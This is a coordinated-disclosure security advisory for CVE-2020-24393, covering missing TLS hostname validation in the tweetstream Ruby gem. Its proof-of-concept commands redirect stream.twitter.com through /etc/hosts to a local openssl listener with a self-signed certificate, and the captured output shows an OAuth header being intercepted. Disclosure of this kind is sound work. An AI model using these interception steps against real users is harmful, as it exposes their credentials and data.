Summary
Missing hostname validation allows an attacker to perform a monster in the middle attack against users of the library.
Product
tweetstream
Tested Version
v2.6.1
Details
Missing SSL/TLS certificate hostname validation
tweetstream uses the library eventmachine in an insecure way that allows an attacker to perform a monster in the middle attack against users of the library.
Impact
An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place.
Resources
To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets.
# Add a fake DNS entry to /etc/hosts.
$ echo "127.0.0.1 stream.twitter.com" | sudo tee -a /etc/hosts
# Create a certificate.
$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
# Listen on port 443 with TLS enabled.
$ openssl s_server -key key.pem -cert cert.pem -accept 443
Using auto DH parameters
Using default temp ECDH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MFUCAQECAgMDBALAMAQABDBvBrl+xDDQQtrfCY7Ze0u3b7D760+4j5LJEYeCpnF+
77Ey6JC8jrtq/HGgyz3KjoahBgIEXsJXjaIEAgIcIKQGBAQBAAAA
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:DHE-RSA-AES256-SHA256:DHE-RSA-CAMELLIA256-SHA256:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:DHE-RSA-AES256-SHA:DHE-RSA-CAMELLIA256-SHA:AES256-GCM-SHA384:AES256-SHA256:CAMELLIA256-SHA256:AES256-SHA:CAMELLIA256-SHA:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-CAMELLIA128-SHA256:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-CAMELLIA128-SHA:AES128-GCM-SHA256:AES128-SHA256:CAMELLIA128-SHA256:AES128-SHA:CAMELLIA128-SHA
CIPHER is ECDHE-RSA-AES256-GCM-SHA384
Secure Renegotiation IS supported
GET /1.1/statuses/sample.json? HTTP/1.1
Host: stream.twitter.com
Accept: */*
User-Agent: TweetStream Ruby Gem 2.6.1
Authorization: OAuth oauth_consumer_key="abcdefghijklmnopqrstuvwxyz", oauth_nonce="972eb094309bad9a27eba729ad15fd39", oauth_signature="LmE4Sgytv6bMWjHm%2B05LX2A7gm4%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1589794701", oauth_token="abcdefghijklmnopqrstuvwxyz", oauth_version="1.0"
Create a sample client with the following contents:
require 'tweetstream'
TweetStream.configure do |config|
config.consumer_key = 'abcdefghijklmnopqrstuvwxyz'
config.consumer_secret = '0123456789'
config.oauth_token = 'abcdefghijklmnopqrstuvwxyz'
config.oauth_token_secret = '0123456789'
config.auth_method = :oauth
end
TweetStream::Client.new.sample do |status|
puts "#{status.text}"
end
Run the example client to see a connection being performed in the listening daemon initialized in the previous steps.
$ ruby tweetstream.rb
References
CWE-297: Improper Validation of Certificate with Host Mismatch
CVE
CVE-2020-24393
Coordinated Disclosure Timeline
- 18/05/2020: Report sent to Vendor
- 24/08/2020: Coordinated disclosure deadline expired, no maintainer response
Credit
This issue was discovered and reported by GHSL team member @agustingianni (Agustin Gianni).
Contact
You can contact the GHSL team at securitylab@github.com
, please include the GHSL-2020-096
in any communication regarding this issue.